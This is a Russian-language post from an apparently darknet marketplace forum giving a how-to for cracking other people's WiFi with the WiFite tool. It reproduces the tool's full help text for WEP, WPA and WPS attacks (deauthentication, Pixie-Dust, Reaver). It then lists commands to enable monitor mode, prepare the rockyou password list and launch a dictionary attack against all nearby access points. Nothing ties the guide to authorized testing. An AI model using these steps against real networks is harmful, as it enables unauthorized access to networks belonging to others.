Jump to content
автогарант Депозитарий
  • Работа-design-power-name.gif

Sign in to follow this  
DJ1N

Взлом WIfi с помощью ултилиты WIFIT

Top Posters


Recommended Posts

НЕ ПРОВЕРЕН ? НЕ ПРОВЕРЕН ?

Справка по WiFite
опциональные аргументы:
  -h, --help           показать справку и выйти
 
НАСТРОЙКИ:
  -i [interface]       Беспроводной интерфейс для использования (по умолчанию: спрашивать)
  -c [channel]         Беспроводные каналы для сканирования (по умолчанию: все каналы)
  -5, --5ghz           Включая 5Ghz каналы (по умолчанию: выключено)
  -b [bssid]           BSSID (например, AA:BB:CC:DD:EE:FF) точки доступа для атаки
  -e [essid]           ESSID (имя) точки доступа для атаки
  -v, --verbose        Вербальный режим, печатать все строки (по умолчанию: тихий)
 
WEP:
  --wep                Показывать только сети с шифрованием WEP (по умолчанию: выключено)
  --require-fakeauth   Атака не удалась, если не удалась фальшивая аутентификация (по умолчанию: выключено)
  --pps [pps]          Пакетов в секунду для восроизведения (по умолчанию: 600 pps)
  --wept [секунды]     Ожидать секунд перед неудачей (по умолчанию: 600 секунд)
  --wepca [ivs]        Запустить взлом на этом количестве IVs (по умолчанию: 10000 ivs)
  --weprs [секунды]    Перезапустить aireplay если не появляются новые IVs (по умолчанию: 11 секунд)
  --weprc [секунды]    Перезапустить aircrack после этой задержки (по умолчанию: 30 секунд)
  --arpreplay          Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено)
  --fragment           Использовать атаку WEP фрагментации (по умолчанию: включено)
  --chopchop           Использовать WEP атаку чоп-чоп (по умолчанию: включено)
  --caffelatte         Использовать WEP атаку Кафе латте (по умолчанию: включено)
  --p0841              Использовать WEP атаку p0841 (по умолчанию: включено)
  --hirte              Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено)
 
WPA:
  --wpa                Показывать только сети с WPA шифрованием (включая WPS)
  --wpadt [секунды]    Время ожидания перед отправкой деаутентификации (по умолчанию: 10 секунд)
  --wpat [секунды]     Время ожидания, чтобыб признать атаку WPA неудачной (по умолчанию: 500 секунд)
  --hs-dir [dir]       Директория для сохранения рукопожатий files (по умолчанию: hs)
  --dict [файл]        Файл, содержащий пароли для взлома (по умолчанию: None)
  --strip              Очистить ненужные пакеты из захваченного рукопожатия используя tshark или pyrit
 
WPS:
  --wps                Показывать только сети с WPS
  --reaver             Использовать ТОЛЬКО Reaver на WPS сетях (по умолчанию: выключено)
  --no-reaver          НЕ использовать Reaver на WPS сетях (по умолчанию: выключено)
  --pixie              Использовать только атаку WPS Pixie-Dust (по умолчанию: выключено)
  --pixiet [секунды]   Время ожидания перед признанием атаки PixieDust неудачной (по умолчанию: 300 секунд)
  --pixiest [секунды]  Время ожидания для шага прогресса перед признанием атаки PixieDust неудачной (по умолчанию: 30 секунд)
  --wpst [секунды]     Время ожидания перед признанием атаки WPS PIN неудачной (по умолчанию: 600 секунд)
  --wpsmr [попытки]    Максимальное количество попыток перед признанием неудачи (по умолчанию: 20)
  --wpsmf [fails]      Максимальное число неудач Reaver перед признанием атаки провалившейся (по умолчанию: 30)
  --wpsmt [timeouts]   Максимальное количество таймаутов перед остановкой (по умолчанию: 30)
  --ignore-ratelimit   Игнорировать атаку, если WPS ограничен по скорости (по умолчанию: включено)
 
КОМАНДЫ:
  --cracked            Показать ранее взломанные точки доступа

Как запустить WiFite
1. ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
2. cp /usr/share/wordlists/rockyou.txt.gz .
3. gunzip rockyou.txt.gz
4. cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

 

 

Установка
1. git clone https://github.com/derv82/wifite2.git
2. cd wifite2/
3. sudo ./Wifite.py --help
Скачиваем из интернета брут словарь.
Дальше вводим данный скрипт:
wifite --dict home/ваш аккаунт/Загрузки/дириктория папки с поролями или sudo wifite --crack --dict ~/newrockyou.txt --all (отака на все точки сети)
После того как вы введете этот скрипт у вас появится данная картинка:

001.png

Нам нужно нажать ctrl-c и выбрать номер сети.
Далее программа начинае подбор и при успешном подборе сохраняет его в папке.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • download(72).gif.87ef6895d8b79749f7c94990f19cd937.gif     download(72).gif.87ef6895d8b79749f7c94990f19cd937.gif

  • 2.gif

    39389961.gif

Пользователь регулярно проводит сделки через гарант сервис и имеет положительную торговую статистику на площадке. Скорее всего ему можно доверять и работать напрямую. С правилами работы через гарант вы можете ознакомится тут.
Пользователь не провел ни одной сделки через гарант. О правилах работы через гарант вы можете ознакомиться тут.
Пользователь внес страховой депозит на форуме. Является проверенным селлеров и гарантированно проводит все сделки через гарант сервис Даркнета. Подробнее о системе депозитов вы можете прочитать тут.
Пользователь не имеет обеспечительного депозита на форуме, при работе с ним не отправляйте предоплату и всегда привлекайте гаранта к сделкам. Подробнее о системе депозитов вы можете прочитать тут.
Статус пользователя "НЕ ПРОВЕРЕН" гласит о том, что он не прошел верификацию своего аккаунта в Даркнете. Верификацию можно пройти предоставив положительные отзывы и рекомендации о себе. Подробнее о том, как пройти верификацию Вы можете прочитать тут.
Статус пользователя "ПРОВЕРЕННЫЙ" говорит о том, что селлер прошел проверку своих товаров или услуг у Администрации Даркнета. Подробнее о том, как пройти проверку вы можете прочитать тут.
×